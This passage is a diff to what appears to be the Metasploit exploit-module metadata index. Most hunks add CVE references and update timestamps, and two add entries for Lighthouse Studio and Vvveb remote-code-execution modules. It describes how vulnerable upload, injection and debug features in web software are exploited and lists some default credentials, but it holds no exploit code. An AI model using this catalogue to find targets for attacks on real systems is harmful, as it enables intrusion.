-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/builderengine_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/builderengine_upload_exec",
@@ -105178,6 +106023,7 @@
    ],
    "description": "This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.\n          This application has an upload feature that allows an unauthenticated\n          user to upload arbitrary files to the 'upload/___1/' directory\n          and then execute it.",
    "references": [
+      "CVE-2012-10050",
      "URL-http://web.archive.org/web/20210922054637/https://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
      "OSVDB-84829"
    ],
@@ -105202,7 +106048,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/cuteflow_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cuteflow_upload_exec",
@@ -105659,6 +106505,7 @@
    ],
    "description": "This module exploits an authentication bypass vulnerability in eXtplorer\n          versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application.\n          This application has an upload feature that allows an authenticated user\n          with administrator roles to upload arbitrary files to any writable\n          directory in the web root. This module uses an authentication bypass\n          vulnerability to upload and execute a file.",
    "references": [
+      "CVE-2012-6710",
      "OSVDB-88751",
      "BID-57058",
      "URL-http://web.archive.org/web/20230128023508/https://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability/",
@@ -105685,7 +106532,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/extplorer_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/extplorer_upload_exec",
@@ -105904,6 +106751,7 @@
    ],
    "description": "This module exploits an arbitrary command execution flaw\n          in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n          to the exec_raw.php page, an attacker may be able to execute arbitrary\n          commands.\n\n          NOTE: This module works best with php/meterpreter payloads.",
    "references": [
+      "CVE-2010-20059",
      "OSVDB-94441",
      "URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download"
    ],
@@ -105928,7 +106776,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/freenas_exec_raw.rb",
    "is_install_path": true,
    "ref_name": "multi/http/freenas_exec_raw",
@@ -106088,6 +106936,7 @@
    ],
    "description": "This module exploits a command injection flaw to create a shell script\n          on the filesystem and execute it. If GestioIP is configured to use no authentication,\n          no password is required to exploit the vulnerability. Otherwise, an authenticated\n          user is required to exploit.",
    "references": [
+      "CVE-2013-10039",
      "URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
      "URL-https://github.com/rapid7/metasploit-framework/pull/2461",
      "URL-https://www.rapid7.com/blog/post/2013/10/03/gestioip-authenticated-remote-command-execution-module"
@@ -106113,7 +106962,7 @@
    "targets": [
      "Automatic GestioIP 3.0"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/gestioip_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gestioip_exec",
@@ -106504,7 +107353,7 @@
      "Windows Command",
      "Windows Dropper"
    ],
-    "mod_time": "2022-11-17 12:25:52 +0000",
+    "mod_time": "2025-10-26 19:19:11 +0000",
    "path": "/modules/exploits/multi/http/gitea_git_fetch_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitea_git_fetch_rce",
@@ -107023,6 +107872,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in Glossword\n          versions 1.8.8 to 1.8.12 when run as a standalone application.\n          This application has an upload feature that allows an authenticated user\n          with administrator roles to upload arbitrary files to the 'gw_temp/a/'\n          directory.",
    "references": [
+      "CVE-2013-10067",
      "EDB-24456",
      "OSVDB-89960"
    ],
@@ -107047,7 +107897,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/glossword_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/glossword_upload_exec",
@@ -108809,6 +109659,7 @@
    ],
    "description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n          This application has an upload feature that allows an unauthenticated user\n          to upload arbitrary files to the '/kordil_edms/userpictures/' directory.",
    "references": [
+      "CVE-2013-10066",
      "OSVDB-90645",
      "EDB-24547"
    ],
@@ -108833,7 +109684,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/kordil_edms_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/kordil_edms_upload_exec",
@@ -109035,6 +109886,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/lighthouse_studio_unauth_rce_cve_2025_34300": {
+    "name": "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
+    "fullname": "exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-16",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "Adam Kues"
+    ],
+    "description": "This module exploits a template injection vulnerability in the\n          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.\n          The application fails to properly sanitize user input within survey templates,\n          allowing unauthenticated attackers to inject and execute arbitrary Perl commands\n          on the target system.\n\n          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.\n          Successful exploitation may result in remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-34300",
+      "URL-https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/"
+    ],
+    "platform": "Multi",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Windows Command"
+    ],
+    "mod_time": "2025-07-26 03:15:00 +0000",
+    "path": "/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/log1cms_ajax_create_folder": {
    "name": "Log1 CMS writeInfo() PHP Code Injection",
    "fullname": "exploit/multi/http/log1cms_ajax_create_folder",
@@ -109177,6 +110088,7 @@
    ],
    "description": "This module can be used to execute a payload on Lucee servers that have an exposed\n          administrative web interface. It's possible for an administrator to create a\n          scheduled job that queries a remote ColdFusion file, which is then downloaded and executed\n          when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,\n          the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;\n          on Linux, it is either the root user or lucee.",
    "references": [
+      "CVE-2025-34074",
      "URL-https://docs.lucee.org/",
      "URL-https://docs.lucee.org/reference/tags/execute.html",
      "URL-https://docs.lucee.org/reference/tags/script.html"
@@ -109203,7 +110115,7 @@
      "Windows Command",
      "Unix Command"
    ],
-    "mod_time": "2023-02-28 17:28:48 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/lucee_scheduled_job.rb",
    "is_install_path": true,
    "ref_name": "multi/http/lucee_scheduled_job",
@@ -109300,6 +110212,7 @@
    ],
    "description": "This module exploits a vulnerability found in Mako Server v2.5, 2.6.\n          It's possible to inject arbitrary OS commands in the Mako Server\n          tutorial page through a PUT request to save.lsp.\n\n          Attacker input will be saved on the victims machine and can\n          be executed by sending a GET request to manage.lsp.",
    "references": [
+      "CVE-2025-34095",
      "EDB-42683",
      "URL-https://blogs.securiteam.com/index.php/archives/3391"
    ],
@@ -109324,7 +110237,7 @@
    "targets": [
      "Mako Server v2.5, 2.6"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/makoserver_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/makoserver_cmd_exec",
@@ -109547,6 +110460,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n          The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n          file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n          in Windows and Linux. The MSP versions do not expose the vulnerable servlet.",
    "references": [
+      "CVE-2019-8394",
      "ZDI-15-396 ",
      "URL-https://github.com/rapid7/metasploit-framework/pull/6038"
    ],
@@ -109571,7 +110485,7 @@
    "targets": [
      "ServiceDesk Plus v9 b9000 - b9102 / Java Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/manageengine_sd_uploader.rb",
    "is_install_path": true,
    "ref_name": "multi/http/manageengine_sd_uploader",
@@ -110389,6 +111303,7 @@
    ],
    "description": "This module exploits a vulnerability in MobileCartly.  The savepage.php file\n          does not do any permission checks before using file_put_contents(), which\n          allows any user to have direct control of that function to create files\n          under the 'pages' directory by default, or anywhere else as long as the user\n          has WRITE permission.",
    "references": [
+      "CVE-2012-10044",
      "OSVDB-85509",
      "EDB-20422 ",
      "BID-55399 "
@@ -110415,7 +111330,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/mobilecartly_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/mobilecartly_upload_exec",
@@ -111122,6 +112037,7 @@
    ],
    "description": "This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8\n          or prior.  In order to execute commands via the FTP service, please note that\n          you must have a valid credential to the web-based administrative console.",
    "references": [
+      "CVE-2012-10028",
      "OSVDB-89105",
      "EDB-23522"
    ],
@@ -111148,7 +112064,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2025-06-23 09:30:35 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/netwin_surgeftp_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/netwin_surgeftp_exec",
@@ -112339,6 +113255,7 @@
    ],
    "description": "If the /install/ directory was not removed, it is possible for an unauthenticated\n          attacker to run the \"install_4.php\" script, which will create the configuration\n          file for the installation. This allows the attacker to inject PHP code into the\n          configuration file and execute it.",
    "references": [
+      "CVE-2018-25114",
      "EDB-44374"
    ],
    "platform": "PHP",
@@ -112362,7 +113279,7 @@
    "targets": [
      "osCommerce 2.3.4.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/oscommerce_installer_unauth_code_exec",
@@ -112952,6 +113869,7 @@
    ],
    "description": "This module exploits a vulnerability found in PHP Volunteer Management System,\n          version v1.0.2 or prior.  This application has an upload feature that allows an\n          authenticated user to upload anything to the 'uploads' directory, which is actually\n          reachable by anyone without a credential.  An attacker can easily abuse this upload\n          functionality first by logging in with the default credential (admin:volunteer),\n          upload a malicious payload, and then execute it by sending another GET request.",
    "references": [
+      "CVE-2012-10056",
      "OSVDB-82391",
      "EDB-18941"
    ],
@@ -112976,7 +113894,7 @@
    "targets": [
      "PHP Volunteer Management 1.0.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/php_volunteer_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/php_volunteer_upload_exec",
@@ -113558,6 +114476,7 @@
    ],
    "description": "This module can detect and exploit the backdoor of PHPStudy.",
    "references": [
+      "CVE-2025-34061",
      "URL-https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html"
    ],
    "platform": "PHP",
@@ -113581,7 +114500,7 @@
    "targets": [
      "PHPStudy 2016-2018"
    ],
-    "mod_time": "2024-07-24 16:42:43 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phpstudy_backdoor_rce",
@@ -113615,6 +114534,7 @@
    ],
    "description": "This module exploits a vulnerability found in PhpTax, an income tax report\n          generator.  When generating a PDF, the icondrawpng() function in drawimage.php\n          does not properly handle the pfilez parameter, which will be used in an exec()\n          statement, and then results in arbitrary remote code execution under the context\n          of the web server.  Please note: authentication is not required to exploit this\n          vulnerability.",
    "references": [
+      "CVE-2012-10037",
      "OSVDB-86992",
      "EDB-21665"
    ],
@@ -113639,7 +114559,7 @@
    "targets": [
      "PhpTax 0.8"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/phptax_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phptax_exec",
@@ -114212,6 +115132,7 @@
    ],
    "description": "This module exploits a PHP code execution vulnerability in the\n          'neoclassic' skin for ProcessMaker Open Source which allows any\n          authenticated user to execute PHP code. The vulnerable skin is\n          installed by default in version 2.x and cannot be removed via\n          the web interface.",
    "references": [
+      "CVE-2013-10035",
      "OSVDB-99199",
      "BID-63411",
      "URL-http://bugs.processmaker.com/view.php?id=13436"
@@ -114237,7 +115158,7 @@
    "targets": [
      "ProcessMaker Open Source 2.x (PHP Payload)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/processmaker_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/processmaker_exec",
@@ -114270,6 +115191,7 @@
    ],
    "description": "This module will generate and upload a plugin to ProcessMaker\n          resulting in execution of PHP code as the web server user.\n\n          Credentials for a valid user account with Administrator roles\n          is required to run this module.\n\n          This module has been tested successfully on ProcessMaker versions\n          1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1;\n          and version 3.2.0 on Debian Linux 8.",
    "references": [
+      "CVE-2025-34097",
      "URL-http://wiki.processmaker.com/3.0/Plugin_Development"
    ],
    "platform": "PHP",
@@ -114293,7 +115215,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/processmaker_plugin_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/processmaker_plugin_upload",
@@ -114390,6 +115312,7 @@
    ],
    "description": "This module exploits a vulnerability found in qdPM - a web-based project management\n          software. The user profile's photo upload feature can be abused to upload any\n          arbitrary file onto the victim server machine, which allows remote code execution.\n          Please note in order to use this module, you must have a valid credential to sign\n          in.",
    "references": [
+      "CVE-2015-3884",
      "OSVDB-82978",
      "EDB-19154"
    ],
@@ -114415,7 +115338,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/qdpm_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/qdpm_upload_exec",
@@ -115049,6 +115972,7 @@
    ],
    "description": "This module exploits multiple design flaws in Sflog 1.0.  By default, the CMS has\n          a default admin credential of \"admin:secret\", which can be abused to access\n          administrative features such as blogs management.  Through the management\n          interface, we can upload a backdoor that's accessible by any remote user, and then\n          gain arbitrary code execution.",
    "references": [
+      "CVE-2012-10042",
      "OSVDB-83767",
      "EDB-19626"
    ],
@@ -115074,7 +115998,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/sflog_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/sflog_upload_exec",
@@ -115344,6 +116268,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in\n          nmap.php and nbtscan.php scripts.",
    "references": [
+      "CVE-2011-10017",
      "OSVDB-67739",
      "URL-http://www.symmetrixtech.com/articles/news-016.html"
    ],
@@ -115368,7 +116293,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/snortreport_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/snortreport_exec",
@@ -115786,6 +116711,7 @@
    ],
    "description": "This module exploits a PHP code injection vulnerability in SPIP. The vulnerability exists\n          in the connect parameter, allowing an unauthenticated user to execute arbitrary commands\n          with web user privileges. Branches 2.0, 2.1, and 3 are affected. Vulnerable versions are\n          < 2.0.21, < 2.1.16, and < 3.0.3. This module is compatible with both Unix/Linux and Windows\n          platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20 on Apache running\n          on Ubuntu, Fedora, and Windows Server.",
    "references": [
+      "CVE-2013-4557",
      "OSVDB-83543",
      "BID-54292",
      "URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
@@ -115813,7 +116739,7 @@
      "Unix/Linux Command Shell",
      "Windows Command Shell"
    ],
-    "mod_time": "2025-05-09 16:09:15 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/spip_connect_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spip_connect_exec",
@@ -116162,6 +117088,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in the\n          Spreecommerce search. Unvalidated input is called via the\n          Ruby send method allowing command execution.",
    "references": [
+      "CVE-2011-10019",
      "OSVDB-76011",
      "URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/"
    ],
@@ -116186,7 +117113,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/spree_search_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spree_search_exec",
@@ -116219,6 +117146,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in\n          the Spreecommerce API searchlogic for versions 0.50.0 and earlier.\n          Unvalidated input is called via the Ruby send method allowing command\n          execution.",
    "references": [
+      "CVE-2011-10026",
      "OSVDB-71900",
      "URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/"
    ],
@@ -116243,7 +117171,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/spree_searchlogic_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/spree_searchlogic_exec",
@@ -118159,6 +119087,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in\n          Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n          This function is called in each script located in the /admicp/ directory to\n          make sure the user has admin rights. This is a broken authorization schema\n          because the header() function doesn't stop the execution flow.\n          This can be exploited by malicious users to execute admin functionality,\n          e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.",
    "references": [
+      "CVE-2011-10013",
      "OSVDB-77556",
      "EDB-18213",
      "URL-http://traqproject.org/"
@@ -118184,7 +119113,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/traq_plugin_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/traq_plugin_exec",
@@ -118342,6 +119271,7 @@
    ],
    "description": "This module exploits an arbitrary file upload vulnerability found within the Up.Time\n          monitoring server 7.2 and below. A malicious entity can upload a PHP file into the\n          webroot without authentication, leading to arbitrary code execution.\n\n          Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly\n          mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use\n          exploits/multi/http/uptime_file_upload_2.",
    "references": [
+      "CVE-2025-34121",
      "OSVDB-100423",
      "BID-64031",
      "URL-http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf"
@@ -118367,7 +119297,7 @@
    "targets": [
      "Up.Time 7.0/7.2"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/uptime_file_upload_1.rb",
    "is_install_path": true,
    "ref_name": "multi/http/uptime_file_upload_1",
@@ -118402,6 +119332,7 @@
    ],
    "description": "This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.\n\n          The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,\n          which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated\n          by the vendor.\n\n          Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it\n          can still be bypassed and gain privilege escalation, and allows the attacker to upload file\n          again, and execute arbitrary commands.",
    "references": [
+      "CVE-2015-9263 ",
      "EDB-37888",
      "URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php"
    ],
@@ -118426,7 +119357,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/uptime_file_upload_2.rb",
    "is_install_path": true,
    "ref_name": "multi/http/uptime_file_upload_2",
@@ -119307,6 +120238,65 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/vvveb_auth_rce_cve_2025_8518": {
+    "name": "Remote Code Execution Vulnerability in Vvveb",
+    "fullname": "exploit/multi/http/vvveb_auth_rce_cve_2025_8518",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-01-10",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "Hamed Kohi"
+    ],
+    "description": "Vvveb CMS is vulnerable to code injection via the Code Editor functionality.\n\n          Unsanitized editing functionality allows attacker-controlled changes to existing files on the web-accessible filesystem,\n          allowing remote authenticated attackers with access to the Code Editor to achieve code execution\n          when those modified files are executed or served by the application or web server.\n\n          This vulnerability affects Vvveb CMS versions up to and including 1.0.5.\n          Successful exploitation may result in the remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-8518",
+      "URL-https://hkohi.ca/vulnerability/8"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP"
+    ],
+    "mod_time": "2025-10-21 19:10:16 +0000",
+    "path": "/modules/exploits/multi/http/vvveb_auth_rce_cve_2025_8518.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/vvveb_auth_rce_cve_2025_8518",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/weblogic_admin_handle_rce": {
    "name": "Oracle WebLogic Server Administration Console Handle RCE",
    "fullname": "exploit/multi/http/weblogic_admin_handle_rce",
@@ -119448,6 +120438,7 @@
    ],
    "description": "This module exploits a vulnerability found in WebPageTest's Upload Feature. By\n          default, the resultimage.php file does not verify the user-supplied item before\n          saving it to disk, and then places this item in the web directory accessible by\n          remote users.  This flaw can be abused to gain remote code execution.",
    "references": [
+      "CVE-2012-10049",
      "OSVDB-83822",
      "EDB-19790"
    ],
@@ -119472,7 +120463,7 @@
    "targets": [
      "WebPageTest v2.6 or older"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/webpagetest_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/webpagetest_upload_exec",
@@ -119506,6 +120497,7 @@
    ],
    "description": "This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django. It may also be used alone.\n\n          The documentation states the following: \"The debugger must never be used on production machines. We cannot stress this enough. Do not enable the debugger in production.\" Of course this doesn't prevent developers from mistakenly enabling it in production!\n\n          Tested against the following Werkzeug versions:\n          - 3.0.3  on Debian 12, Windows 11 and macOS 14.6\n          - 1.1.4  on Debian 12\n          - 1.0.1  on Debian 12\n          - 0.11.5 on Debian 12\n          - 0.10   on Debian 12",
    "references": [
+      "CVE-2024-34069",
      "URL-https://werkzeug.palletsprojects.com/debug/#enabling-the-debugger",
      "URL-https://flask.palletsprojects.com/debugging/#the-built-in-debugger",
      "URL-https://web.archive.org/web/20150217044248/http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger",
@@ -119536,7 +120528,7 @@
      "Werkzeug 0.11 - 0.11.5 (Flask < 1.0)",
      "Werkzeug < 0.11 (Flask < 1.0)"
    ],
-    "mod_time": "2024-12-08 21:01:17 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/werkzeug_debug_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/werkzeug_debug_rce",
@@ -119750,6 +120742,7 @@
    ],
    "description": "The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and\n          execute arbitrary PHP code.  The upload-handler does not require authentication, nor validates\n          the uploaded content.  It may return an error when attempting to parse a CSV, however the\n          uploaded shell is left.  The shell is uploaded to wp-content/uploads/.  The plugin is not\n          required to be activated to be exploitable.",
    "references": [
+      "CVE-2020-36849",
      "URL-https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup",
      "WPVDB-10471"
    ],
@@ -119774,7 +120767,7 @@
    "targets": [
      "AIT CSV Import Export <3.0.4"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/wp_ait_csv_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_ait_csv_rce",
@@ -120122,6 +121115,7 @@
    ],
    "description": "There exists a command injection vulnerability in the Wordpress plugin\n          `wp-database-backup` for versions < 5.2.\n\n          For the backup functionality, the plugin generates a `mysqldump` command\n          to execute. The user can choose specific tables to exclude from the backup\n          by setting the `wp_db_exclude_table` parameter in a POST request to the\n          `wp-database-backup` page. The names of the excluded tables are included in\n          the `mysqldump` command unsanitized. Arbitrary commands injected through the\n          `wp_db_exclude_table` parameter are executed each time the functionality\n          for creating a new database backup are run.\n\n          Authentication is required to successfully exploit this vulnerability.",
    "references": [
+      "CVE-2019-25224",
      "URL-https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/"
    ],
    "platform": "Linux,Windows",
@@ -120146,7 +121140,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/wp_db_backup_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_db_backup_rce",
@@ -121102,7 +122096,8 @@
    ],
    "description": "Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers\n          to upload files within a controlled list of extensions.  However, the rename function does not conform to\n          the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed\n          to php and executed.",
    "references": [
-      "URL-https://wpscan.com/vulnerability/10192",
+      "CVE-2020-36847",
+      "WPVDB-10192",
      "URL-https://www.cybersecurity-help.cz/vdb/SB2020042711",
      "URL-https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list",
      "EDB-48349"
@@ -121128,7 +122123,7 @@
    "targets": [
      "Default"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/exploits/multi/http/wp_simple_file_list_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_simple_file_list_rce",
@@ -121913,6 +122908,7 @@
    ],
